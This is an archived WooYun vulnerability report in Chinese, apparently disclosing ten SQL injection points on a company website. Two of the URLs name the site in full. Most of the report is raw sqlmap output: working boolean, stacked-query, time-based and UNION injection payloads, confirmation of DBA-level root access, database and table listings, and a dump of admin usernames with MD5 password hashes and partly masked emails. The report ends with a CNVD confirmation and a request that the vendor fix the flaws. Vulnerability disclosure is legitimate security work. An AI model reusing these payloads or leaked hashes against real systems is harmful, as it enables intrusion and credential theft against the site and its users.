乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-02: 细节已通知厂商并且等待厂商处理中 2015-11-06: 厂商已经确认,细节仅向厂商公开 2015-11-16: 细节向核心白帽子及相关领域专家公开 2015-11-26: 细节向普通白帽子公开 2015-12-06: 细节向实习白帽子公开 2015-12-21: 细节向公众公开
...走个大厂商吧
十处SQL注入打包,DBA权限,涉及多库第一处:
http://**.**.**.**/about.php?id=13参数id存在注入
第二处:
http://**.**.**.**/caselist.php?id=55id参数存在注入
第三处:
http://**.**.**.**/huodonglist.php?id=46id参数存在注入
第四处:
http://**.**.**.**/news.php?id=16id参数存在注入
第五处:
http://**.**.**.**/newsDetail.php?id=34&tid=13id和tid参数都存在注入
第六处:
http://**.**.**.**/product.php?id=1id参数存在注入
第七处:
http://**.**.**.**/productDetail.php?id=48&pid=1&tid=1id,pid和tid参数都存在注入
第八处:
http://**.**.**.**/shhzhx.php?id=5&pid=24id,pid参数都存在注入
第九处:
http://www.ubestchoice.co/shhzhxDetail.php?id=120&tid=2id和tid参数存在注入
第十处:
http://www.ubestchoice.co/srshqDetail.php?id=53id参数存在注入
web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0.11current user: 'root@localhost'current database: 'sq_boqiao1019'current user is DBA: Trueavailable databases [13]:[*] bqmobile[*] db_opencart[*] extmail[*] information_schema[*] jifen_fangyuan[*] mysql[*] sq_boqiao1019[*] test[*] v9_phpcms[*] we_ticket[*] yudianapp[*] zhuqing[*] zyysqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13 AND 9380=9380 Vector: AND [INFERENCE] Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: id=13;(SELECT * FROM (SELECT(SLEEP(5)))kumB)# Vector: ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=13 AND (SELECT * FROM (SELECT(SLEEP(5)))renQ) Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=-4940 UNION ALL SELECT NULL,NULL,CONCAT(0x7178767171,0x71566b41415776704867,0x71627a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0.11Database: sq_boqiao1019[29 tables]+--------------------+| ywy_aboutus || ywy_aboutus_type || ywy_admin || ywy_growup || ywy_growup_type || ywy_joininfo || ywy_lianjie || ywy_link || ywy_login_log || ywy_mail || ywy_menu || ywy_news || ywy_news_type || ywy_partner || ywy_partner_type || ywy_photolink || ywy_photolink_type || ywy_product || ywy_product_type || ywy_project || ywy_project_type || ywy_qqemail || ywy_role || ywy_role_menu || ywy_sever || ywy_sever_type || ywy_state || ywy_traning || ywy_traning_type |+--------------------+web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0.11Database: sq_boqiao1019Table: ywy_admin[9 columns]+-------------+-------------+| Column | Type |+-------------+-------------+| create_time | int(11) || email | varchar(50) || id | int(11) || last_time | int(11) || password | varchar(32) || role_id | int(11) || state_id | int(11) || user_id | varchar(20) || username | varchar(20) |+-------------+-------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=13 AND 9380=9380 Vector: AND [INFERENCE] Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: id=13;(SELECT * FROM (SELECT(SLEEP(5)))kumB)# Vector: ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=13 AND (SELECT * FROM (SELECT(SLEEP(5)))renQ) Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: id=-4940 UNION ALL SELECT NULL,NULL,CONCAT(0x7178767171,0x71566b41415776704867,0x71627a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web server operating system: Linux CentOS 6.5web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0.11Database: sq_boqiao1019Table: ywy_admin[4 entries]+----------+----------------------------------+----------------------+| username | password | email |+----------+----------------------------------+----------------------+| admin | a4f9d30dfcbef436232b727875854fd0 | 2567620045@**.**.**.** || admin2 | 21232f297a57a5a743894a0e4a801fc3 | 1014159113@**.**.**.** || admin | 8b865969a618b3210480307c5baf2d8e | yl.han@**.**.**.** || admin | 24413c88b3534d9fc17279997cd0fffb | 923133450@**.**.**.** |+----------+----------------------------------+----------------------+
参数过滤,就不继续深入了,尽快修复吧
危害等级:高
漏洞Rank:10
确认时间:2015-11-06 16:15
CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无